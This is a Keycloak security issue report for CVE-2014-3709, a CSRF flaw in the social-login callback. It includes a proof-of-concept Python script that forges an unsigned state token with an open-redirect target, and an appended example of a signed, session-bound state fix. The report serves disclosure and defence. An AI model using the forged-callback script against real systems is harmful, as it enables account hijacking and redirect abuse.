  2. KEYCLOAK-765

CVE-2014-3709 SocialResource callback CSRF


Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Done
    • Affects Version/s: 1.0.1.Final
    • Fix Version/s: 1.0.3.Final
    • Component/s: None
    • Labels: None
    • Security Level: This issue is security relevant

      I used the script below to experiment with this feature. The code was obtained over the Github API.

      social-callback.py
      # Python 2 script (urllib2 / print statement).
      import json
      from urllib import quote
      import urllib2
      from base64 import b64encode
      
      callback_uri = 'http://localhost:8080/auth/social/callback'
      
      def b64json(obj):
          # base64url-encode the JSON document and strip the '=' padding, as JWT does.
          result = b64encode(json.dumps(obj), "-_")
          while result[-1:] == '=':
              result = result[:-1]
          return result
      
      def build_jwt(header, content):
          # Two-part token (header.payload) with no signature segment.
          return b64json(header) + '.' + b64json(content)
      
      # The state parameter is built entirely client-side: empty header, no signature.
      state = build_jwt(
          {},
          content = {
              "realm" : "master",
              "provider" : "github",
              "attributes" : {
                  "client_id" : "security-admin-console",
                  "redirect_uri" : "http://redhat.com/redirect", # open redirector
              },
          })
      print state
      
      # OAuth authorization code previously obtained from Github.
      code = "1fd30ea95e58a1402670"
      
      # Call the social callback endpoint directly with the self-made state.
      uri = "{}?code={}&state={}".format(
          callback_uri, quote(code), quote(state))
      print repr(uri)
      req = urllib2.urlopen(uri)
      print repr(req)
      

    Description

      The /auth/social/callback implemented in org.keycloak.services.resources.SocialResource.callback(String) looks as if it may need CSRF protection.

      I see multiple potential issues here:

      1. A logged-in user might be associated with a social account supplied by the attacker, granting the attacker access to the Keycloak-managed account.
      2. There appears to be an open redirector (see the comment “open redirector” in the script below).
      3. An attacker could use this interface to create a high volume of OAuth API calls to the social web authentication provider, which might result in blacklisting of the Keycloak service. This aspect should be a consideration when deciding which kind of CSRF countermeasure to implement.

      I have no clean reproducer for the first two issues, but the reflector attack works (but I didn't push it to the point at which Github would blacklist me).
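      The countermeasures the report asks for, as an added example that is not Keycloak's code: the server mints the state itself, binds it to the browser session with a random nonce and an HMAC, and honours a redirect_uri only if it exactly matches one registered for the client. STATE_KEY, REGISTERED_REDIRECTS, new_session_nonce and handle_callback are assumptions made for this example; the forged-state shape it rejects is the one the script above builds (empty header, no signature).

```python
"""Server-side state handling for a social-login callback (added example,
not Keycloak code).  Assumed: STATE_KEY is a server-only secret,
REGISTERED_REDIRECTS is the client registry, and session_nonce is a random
value the server stored in the browser session when it started the login."""
import base64
import binascii
import hashlib
import hmac
import json
import secrets

# Constructed for this example; a real deployment uses a per-installation key.
STATE_KEY = b"constructed-example-key-replace-in-deployment"

# Hypothetical client registry: only these redirect targets are ever honoured.
REGISTERED_REDIRECTS = {
    "security-admin-console": {"http://localhost:8080/auth/admin/console/"},
}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Re-add the padding that was stripped at encoding time.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def new_session_nonce() -> str:
    """Random per-login value; store it in the user's session before redirecting
    to the provider.  It ties the callback to the browser that started the login."""
    return secrets.token_urlsafe(16)


def redirect_allowed(client_id: str, redirect_uri: str) -> bool:
    """Exact-match allow-list check that closes the open redirector
    (no prefix or substring matching)."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


def mint_state(session_nonce, realm, provider, client_id, redirect_uri) -> str:
    """state = base64url(payload) '.' base64url(HMAC-SHA256(STATE_KEY, payload))."""
    if not redirect_allowed(client_id, redirect_uri):
        raise ValueError("redirect_uri is not registered for this client")
    payload = json.dumps(
        {"realm": realm, "provider": provider, "client_id": client_id,
         "redirect_uri": redirect_uri, "nonce": session_nonce},
        sort_keys=True, separators=(",", ":")).encode("utf-8")
    tag = hmac.new(STATE_KEY, payload, hashlib.sha256).digest()
    return b64url_encode(payload) + "." + b64url_encode(tag)


def verify_state(state: str, session_nonce: str):
    """Return the claims if `state` was minted by this server for this session,
    else None.  Every check runs before any call to the social provider, so a
    forged callback never costs an API call (concern 3 in the report)."""
    try:
        payload_b64, tag_b64 = state.split(".")
        payload = b64url_decode(payload_b64)
        tag = b64url_decode(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(STATE_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # unsigned or attacker-built state, as in the script above
    claims = json.loads(payload)
    if not hmac.compare_digest(claims["nonce"].encode(), session_nonce.encode()):
        return None  # genuine token, but minted for a different browser session
    if not redirect_allowed(claims["client_id"], claims["redirect_uri"]):
        return None  # registry changed since the state was minted
    return claims


def handle_callback(query: dict, session_nonce: str) -> str:
    """What a /auth/social/callback handler should decide for one request."""
    if "code" not in query or "state" not in query:
        return "reject: missing code or state"
    claims = verify_state(query["state"], session_nonce)
    if claims is None:
        return "reject: state not bound to this session"
    # Only now exchange query["code"] with the provider and link the account.
    return "ok: link %s account in realm %s, then redirect to %s" % (
        claims["provider"], claims["realm"], claims["redirect_uri"])
```

      The nonce check is what turns the state into a CSRF token: a link or form on an attacker's page can carry a state value, but not one minted for the victim's session. Rejecting before the code exchange also keeps forged requests from turning into outbound calls to the provider.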

          People

            sthorger@redhat.com Stian Thorgersen
            fweimer@redhat.com Florian Weimer
            Bill Burke (Inactive), Stian Thorgersen, Trevor Jay (Inactive)